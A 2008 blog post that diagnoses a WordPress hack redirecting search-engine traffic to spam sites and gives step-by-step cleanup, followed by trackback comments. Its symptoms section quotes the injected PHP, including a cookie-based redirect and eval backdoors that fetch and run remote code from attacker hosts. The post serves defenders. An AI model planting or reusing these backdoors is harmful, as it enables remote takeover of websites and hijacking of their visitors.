WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redirected to Your-Needs.info, AnyResults.Net, Golden-Info.net and Other Illegal Sites

Hackers are going all out to hack and exploit WordPress blogs hosted all over the web, planting and injecting malicious code into WordPress codes and database in order to redirect visitors and hits from Google and other search engines to spam sites such as your-needs.info, anyresults.net, golden-info.net, keymachine.de, beliy.us, seogoogle.us and many other spam sites that filled with pay-per-click CPC ads. Some hack appears to target bigger crowd by redirecting all without WordPress cookie. Without been hacked, these traffic supposedly to arrive at the blog as destination.

Symptoms of the Search Engine Redirection Hack

Note that not all symptoms may happen altogether. There may be more than one method of hacks existed, which contributed to different finding and possible resolution.

  • Any click through from search engines such as Google, Yahoo, AOL, MSN, Windows Live search results, including blog name, will be redirected and forwarded to hacker’s sites such as your-needs.info, anyresults.net, golden-info.net, keymachine.de, beliy.us, seogoogle.us, with the list sure to grow. Viewer arrives at the hacker page with the same search string that he or she used to search in search engine.
  • Click on a link to the blog on RSS feed reader such as Google reader can be redirected to hacker site too.
  • A visitor with no account on the blog, or not login (hence does not has cookie detected by malicious code), will be redirected to spam sites.
  • Only visits from search engine are been redirected away, and the trick manage to fool around probably a lot of bloggers, webmasters and site owners, or at least delay the detection of the problem.
  • Sudden huge and dramatic drop and lose of massive amount of visitors traffic and page views in web tracker statistics, especially traffic with Google as referrer, even though search engine results ranking is intact.
  • Massic drop of advertising revenue from Google AdSense or other ads network, or affiliate commissions.
  • The following base64 encoded PHP code may appear on the wp-blog-header.php file:

    <?php \
    $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");
    $ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
    if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit; }?>

  • An image, which is in fact a bunch of malicious PHP code, was added to the wp-contents/uploads directory. For example, wp-contents/uploads/2008/06/06/abcdefghijklmn.jpg, or it may be inside your theme folder, i.e. wp-contents/themes/classic/images/xyz.jpg. The name of the image may be in the format of xxxxxx_old.jpeg.
  • An entry was inserted in MySQL database for WordPress wp_options to activate the image (the malicious PHP code) as a plugin, typically as rss_f541b3abd05e7962fcab37737f40fad8.
  • There may be also malicious codes, especially those that interpreted with eval() or base64_decode() command been inserted into other WordPress PHP files. Examples are the following codes:

    if(isset($_GET['p'])) {
    $sock = @fsockopen(’km20725.keymachine.de’, 80);
    if($sock){
    fwrite ($sock, ‘GET http://km20725.keymachine.de/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p'].’ HTTP/1.0′.”\r\n”);
    fwrite ($sock, ‘Host: km20725.keymachine.de’.”\r\n\r\n”);
    while($content[] = fgets ($sock));
    $content = implode(”, $content);
    @eval(trim(substr($content, strpos($content, “\r\n\r\n”))));
    fclose ($sock);}
    }

    if(isset($_GET['p'])) { @eval(@file_get_contents(’http://beliy.us/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p']));
    }

    if(isset($_GET['p'])) { @eval(@file_get_contents(’http://seogoogle.us/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p']));
    }

    eval(gzinflate(base64_decode(

  • WordPress theme that is been activated and used can be injected with hacking code and affected too. Such code normally exists in header.php or index.php of the theme, and has a line similar to the below

    if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location:

The WordPress search traffic redirect to spam site hack happens probably due to security hole and vulnerability that is not patched when blog owner decides not to upgrade to latest version of WordPress (although some reports that their blogs been hacked even though it’s already on the latest version of WordPress 2.5.1). Whatever the cause, here’s the fix and solution to resolve and defeat the hack to ensure that you own back the traffic and avoid been penalized by Google by unreasonable redirecting to spam pages.

  1. Backup the WordPress database.
  2. Use phpMyAdmin to browse WordPress MySQL database tables. Go to wp_options table, and then edit the row named active_plugins. The row details all active plugins that has been activated. Go through the list (in a line), and look for an a plugin named ended with an image extension, such as .jpg, .jpeg, .gif and etc. For example, abcdefgh_old.jpeg. Note down the path to the image file.
  3. Using sFTP or SSH (forget about FTP or Telnet for security), then navigate to the path of the file, and delete the file.
  4. Go to WordPress Administrator Plugins panel, deactivate or activate any plugin to clear off the malicious plugin from the “active_plugins” row.
  5. Back to phpMyAdmin, at the wp_options table, find a row that contains the following string as option_name:

    rss_f541b3abd05e7962fcab37737f40fad8

    Delete the row away.

    If you don’t know how to perform the database cleanup detailed in steps above, here’s a video tutorial:

  6. Go to wp_users table. If there is a nameless user (null value in user_nicename field) created at 00:00:00 on 0000-00-00, note down the user ID (ID field, a number). Delete the user.
  7. Browse the wp_usermeta table. Locate all rows with user_id matches the ID of the deleted illegal user. There are normally three rows been associated to the invader user ID. Delete all the associated rows.
  8. Login to the server to edit the theme files, or browse the theme files’ code in Theme Editor of WordPress Administrator Design panel. Check the header.php and index.php for any suspicious code. As mentioned above, look for something similar to the line below:

    if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location:

    If found, delete and remove the code. Note that the malicious code will be several lines long in total.

  9. If it’s not already existed, create an empty index.html file in the wp-contents/plugins directory. The blank index.html hides the contents of the plugins directory, effectively shield what plug-ins been used from hackers to harden and tighten the WordPress security.
  10. Upload and replace each and every WordPress files (not only wp-blog-header.php) on the server with the fresh, clean, and original latest version from WordPress (of course, except few files such as wp-config.php and themes). If you’re upgrading, read the guide carefully.
  11. Change your password.
  12. If you have multiple users, change theirs password (or ask them to change the password) too.

Share and contribute or get technical support and help at My Digital Life Forums.



11 Responses to “WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redirected to Your-Needs.info, AnyResults.Net, Golden-Info.net and Other Illegal Sites”

  1. WordPress Blogs and More Hacked by Google Redirects « Lorelle on WordPress
    June 12th, 2008 10:06
    1

    [...] My Digital Life - WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redi… [...]

  2. Znów ataki na WordPressowe blogi « zielony bloger pl
    June 12th, 2008 11:14
    2

    [...] wersja WP 2.5.1 była narażona na jakieś problemy. A w całym tym zamieszaniu, zwanym już Search Engine Redirection Hack, chodzi o przekierowanie ruchu z wyszukiwarek, głównie Google, choć nie tylko, na specjalnie [...]

  3. Is your Wordpress blog hacked? Why not upgrade to the latest version? | MyTestBox.com - web software reviews
    June 12th, 2008 14:43
    3

    [...] WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redirected to Your-Nee… Share or Send This to friends Sphere: Related ContentWant more web software reviews? Then make sure you subscribe to our RSS feed or get our customizable widget and embed it on your site! Related posts WordPress - the most used open source blog software [...]

  4. WordPress Blog di Hack | WordPress [at] mimpikami . com
    June 12th, 2008 19:40
    4

    [...] Kalau peringkat blog WordPress kita di Google tetap untuk keyword kita, tapi pengunjung turun drastis, hati-hati, bisa jadi itu artinya blog kita kena hack dan di redirect ke situs spam. [...]

  5. Chando’s Internet Marketing Secrets Blog » Blog Archive » WordPress Blogs and More Hacked by Google Redirects
    June 13th, 2008 12:00
    5

    [...] My Digital Life - WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redi… [...]

  6. links for 2008-06-13 at nyc.locationscout.us
    June 13th, 2008 13:36
    6

    [...] WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redirected - My Digita… WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redirected to Your-Needs.info, AnyResults.Net, Golden-Info.net and Other Illegal Sites » My Digital Life (tags: wordpress security) [...]

  7. blosque.com | Suas Visitas do Google Sumiram? Seu Wordpress Pode Ter Sido Hackeado
    June 18th, 2008 22:08
    7

    [...] My Digital Life - WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redi… [...]

  8. Blogosfera virusata… dar, cu mine ce-ati avut?! » Stealth Settings
    July 3rd, 2008 03:08
    8

    [...] ca sa-mi dau sema unde e buba, daca nu mi-ar fi spus Eugen intr-o discutie la cafea, ca a gasit un link pe Google si ar fi bine sa-l vad. MyDigitalLife.info, au publicat un articol cu titlul :  [...]

  9. Hacked! Supposed attack site. | Ethan W. Brown : //etano.net
    July 15th, 2008 08:10
    9

    [...] I caught it early on and made sure to remove all the malicious code.  Here is nice tutorial on how to clean your site if this were to happen to [...]

  10. mike demers dot net » Blog Archive » My WordPress Blog Got Hacked by a Spammer
    July 17th, 2008 10:30
    10

    [...] WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redirected to Your-Nee…. [...]

  11. Stato transitorio at pensieri (pulsazioni)
    July 25th, 2008 09:49
    11

    [...] avere una merda come quella tra le mani.Se siete già stati infestati o pensate di esserlo, qui e qui troverete le specifiche dell’exploit e alcuni consigli utili per [...]

Leave a Reply

You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Subscribe without commenting


Custom Search

New Articles

Incoming Search Terms for the Article

wordpress hack - wordpress hacked - google search redirected - google search redirected 2008 - hack WordPress - google links redirect - "fix google" - how to fix google - "how to hack wordpress" - Google redirects my search page - wordpress stats no search engine hits - google search is redirected 2008 - theme wordpress hack - restore google search engine - fix google redirect problem - google search redirect fix - google search hack - how to hack a wordpress blog - rss_f541b3abd05e7962fcab37737f40fad8 - Wordpress : blog hacked with a RSS feed hack - fix google - how to, redirect, fix - cheap downloadable software wordpress hacked - google link hack - hack cookie google analytics visits - how to hack the google server - index.php files replaced hack 'attack wordpress - repair my image google search - wordpress wp_options spam - wordpress hack index.php - wordpress for gaming related sites - google link redirected fix - google re-direct fix - hacking word press - hack google images code - how to repair google search - km20725 - my search engine redirecting my search - recover google password from cookies - search engine password hacker - wordpress google searches going down - wordpress google searches - cookie internet explorer my digital life - eval base64 encode php virus wordpress - fixing google redirect spam - golden msn id password hacker - google link redirect - google search redirect - malicious code wordpress - restore id plugins wordpress -